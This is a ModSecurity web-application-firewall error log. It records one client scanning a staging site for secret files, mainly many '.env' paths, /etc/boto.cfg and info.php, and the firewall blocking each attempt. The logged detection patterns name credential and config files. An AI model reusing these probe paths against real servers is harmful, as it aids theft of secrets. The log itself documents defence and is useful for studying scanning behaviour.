[Tue May 26 15:31:03.447415 2026] [security2:error] [pid 715645:tid 715870] [client 195.178.110.199:55976] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/develop/.env"] [unique_id "ahVvX3VGgMGh8k213RgUmAAAAF8"]
[Tue May 26 15:31:03.458705 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/developer/.env"] [unique_id "ahVvX3VGgMGh8k213RgUnAAAAGY"]
[Tue May 26 15:31:03.488271 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:55992] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUlwAAACs"]
[Tue May 26 15:31:03.501476 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUmwAAAEA"]
[Tue May 26 15:31:03.510039 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUnwAAAGA"]
[Tue May 26 15:31:03.531609 2026] [security2:error] [pid 715645:tid 715843] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUogAAAEQ"]
[Tue May 26 15:31:03.569916 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUpQAAAGg"]
[Tue May 26 15:31:03.579107 2026] [security2:error] [pid 715645:tid 715853] [client 113.176.84.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUcQAAAE4"]
[Tue May 26 15:31:03.622959 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUqAAAAEc"]
[Tue May 26 15:31:03.647547 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:41746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUqQAAAC4"]
[Tue May 26 15:31:03.660086 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/erp/.env"] [unique_id "ahVvX3VGgMGh8k213RgUvAAAACY"]
[Tue May 26 15:31:03.679667 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUsQAAAEg"]
[Tue May 26 15:31:03.681329 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUtQAAABc"]
[Tue May 26 15:31:03.689121 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUtwAAABw"]
[Tue May 26 15:31:03.693225 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUuwAAAGk"]
[Tue May 26 15:31:03.724607 2026] [security2:error] [pid 715645:tid 715897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUvwAAAHo"]
[Tue May 26 15:31:03.730605 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUxQAAABM"]
[Tue May 26 15:31:03.735889 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUxgAAAE8"]
[Tue May 26 15:31:03.736831 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUwgAAAB4"]
[Tue May 26 15:31:03.821472 2026] [security2:error] [pid 715645:tid 715776] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUygAAAAE"]
[Tue May 26 15:31:03.834577 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUzwAAABg"]
[Tue May 26 15:31:03.836441 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVvX3VGgMGh8k213RgU3QAAAAA"]
[Tue May 26 15:31:03.852297 2026] [security2:error] [pid 715645:tid 715817] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU1AAAACo"]
[Tue May 26 15:31:03.867368 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU1gAAAFQ"]
[Tue May 26 15:31:03.869289 2026] [security2:error] [pid 715645:tid 715870] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/etc/boto.cfg"] [unique_id "ahVvX3VGgMGh8k213RgU4QAAAF8"]
[Tue May 26 15:31:03.877711 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU3AAAAE0"]
[Tue May 26 15:31:03.879771 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU2QAAABE"]
[Tue May 26 15:31:03.890008 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU4AAAAFI"]
[Tue May 26 15:31:03.965835 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:55942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/fe/.env"] [unique_id "ahVvX3VGgMGh8k213RgU5AAAAAk"]
[Tue May 26 15:31:03.969059 2026] [security2:error] [pid 715645:tid 715781] [client 195.178.110.199:55976] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/front/.env"] [unique_id "ahVvX3VGgMGh8k213RgU6AAAAAY"]
[Tue May 26 15:31:04.007715 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:41680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/frontend/.env"] [unique_id "ahVvYHVGgMGh8k213RgU8gAAABI"]
[Tue May 26 15:31:04.011735 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU6QAAACw"]
[Tue May 26 15:31:04.029523 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU7gAAADA"]
[Tue May 26 15:31:04.038188 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgU7QAAACg"]
[Tue May 26 15:31:04.038493 2026] [security2:error] [pid 715645:tid 715825] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvX3VGgMGh8k213RgUuAAAADI"]
[Tue May 26 15:31:04.095185 2026] [security2:error] [pid 715645:tid 715840] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgU9QAAAEE"]
[Tue May 26 15:31:04.114831 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:41834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgU9gAAAEc"]
[Tue May 26 15:31:04.146489 2026] [security2:error] [pid 715645:tid 715847] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgU-QAAAEg"]
[Tue May 26 15:31:04.173743 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:41628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/info.php"] [unique_id "ahVvYHVGgMGh8k213RgU_wAAACc"]
[Tue May 26 15:31:04.177232 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/laravel/.env"] [unique_id "ahVvYHVGgMGh8k213RgVAAAAAEI"]
[Tue May 26 15:31:04.182547 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:55992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/infophp.php"] [unique_id "ahVvYHVGgMGh8k213RgVAgAAAC0"]
[Tue May 26 15:31:04.183395 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/lms/.env"] [unique_id "ahVvYHVGgMGh8k213RgVAwAAAAM"]
[Tue May 26 15:31:04.185744 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgU_AAAADo"]
[Tue May 26 15:31:04.199448 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:55976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/infos.php"] [unique_id "ahVvYHVGgMGh8k213RgVBwAAADU"]
[Tue May 26 15:31:04.226772 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgVAQAAAGk"]
[Tue May 26 15:31:04.228396 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgVBgAAAF4"]
[Tue May 26 15:31:04.284113 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgVCgAAAB4"]
[Tue May 26 15:31:04.712101 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgVHAAAAGc"]
[Tue May 26 15:31:04.910363 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYHVGgMGh8k213RgVJgAAADk"]
[Tue May 26 15:31:04.936932 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/local/.env"] [unique_id "ahVvYHVGgMGh8k213RgVKAAAAAs"]
[Tue May 26 15:31:05.345199 2026] [security2:error] [pid 715645:tid 715881] [client 181.177.103.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvYXVGgMGh8k213RgVNgAAAGo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:31:05.460725 2026] [security2:error] [pid 715645:tid 715798] [client 114.119.128.56:64545] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/glorod_new/index.php"] [unique_id "ahVvYXVGgMGh8k213RgVPgAAABc"], referer: http://glorodavionics.com/glorod_new/index.php?route=common/home
[Tue May 26 15:31:05.586113 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvYXVGgMGh8k213RgVRAAAAHE"]
[Tue May 26 15:31:05.688668 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node-api/.env"] [unique_id "ahVvYXVGgMGh8k213RgVSQAAAE8"]
[Tue May 26 15:31:05.716782 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/.env"] [unique_id "ahVvYXVGgMGh8k213RgVSgAAAHM"]
[Tue May 26 15:31:05.735196 2026] [security2:error] [pid 715645:tid 715873] [client 114.119.156.102:31889] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/home-equity-loan.php"] [unique_id "ahVvYXVGgMGh8k213RgVTAAAAGI"], referer: https://www.toronto121mortgage.com/
[Tue May 26 15:31:05.747942 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:41706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/node/backend/.env"] [unique_id "ahVvYXVGgMGh8k213RgVTQAAAFQ"]
